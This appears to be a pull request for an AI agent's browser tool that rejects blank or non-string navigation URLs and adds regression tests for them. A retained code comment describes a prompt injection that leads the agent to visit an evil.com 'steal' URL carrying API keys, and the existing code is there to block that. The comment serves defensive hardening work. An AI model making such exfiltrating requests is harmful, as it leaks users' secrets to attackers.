### PR TITLE
fix(browser): reject empty navigate URLs

### DIFF
--- a/tests/tools/test_browser_navigate_blank_url_guard.py
+++ b/tests/tools/test_browser_navigate_blank_url_guard.py
@@ -1,0 +1,19 @@
+"""Regression tests for missing/blank browser_navigate URLs."""
+
+import json
+
+from tools.browser_tool import browser_navigate
+
+
+def test_browser_navigate_blank_url_returns_clean_error():
+    result = json.loads(browser_navigate("   \n\t  "))
+
+    assert result["success"] is False
+    assert "empty" in result["error"].lower()
+
+
+def test_browser_navigate_non_string_url_returns_clean_error():
+    result = json.loads(browser_navigate(None))  # type: ignore[arg-type]
+
+    assert result["success"] is False
+    assert "expected string" in result["error"].lower()

--- a/tools/browser_tool.py
+++ b/tools/browser_tool.py
@@ -2296,9 +2296,22 @@ def browser_navigate(url: str, task_id: Optional[str] = None) -> str:
     Returns:
         JSON string with navigation result (includes stealth features info on first nav)
     """
+    if not isinstance(url, str):
+        return json.dumps({
+            "success": False,
+            "error": "Expected string URL; URL must be non-empty",
+        })
+
+    url = url.strip()
+    if not url:
+        return json.dumps({
+            "success": False,
+            "error": "URL must not be empty",
+        })
+
     # Secret exfiltration protection — block URLs that embed API keys or
     # tokens in query parameters. A prompt injection could trick the agent
-    # into navigating to https://evil.com/steal?key=sk-ant-... to exfil secrets.
+    # into navigating to https://evil.com/steal?key=*** to exfil secrets.
     # Also check URL-decoded form to catch %2D encoding tricks (e.g. sk%2Dant%2D...).
     import urllib.parse
     from agent.redact import _PREFIX_RE


### PR DESCRIPTION
## Summary
- Reject non-string and blank `browser_navigate` URLs before launching a browser backend
- Add regression tests for clean JSON errors on empty/non-string inputs

## Test Plan
- `python -m pytest tests/tools/test_browser_navigate_blank_url_guard.py -q -o 'addopts='`
- `python -m pytest tests/tools/test_browser_secret_exfil.py tests/tools/test_browser_ssrf_local.py tests/tools/test_browser_hardening.py tests/tools/test_browser_navigate_blank_url_guard.py -q -o 'addopts='`
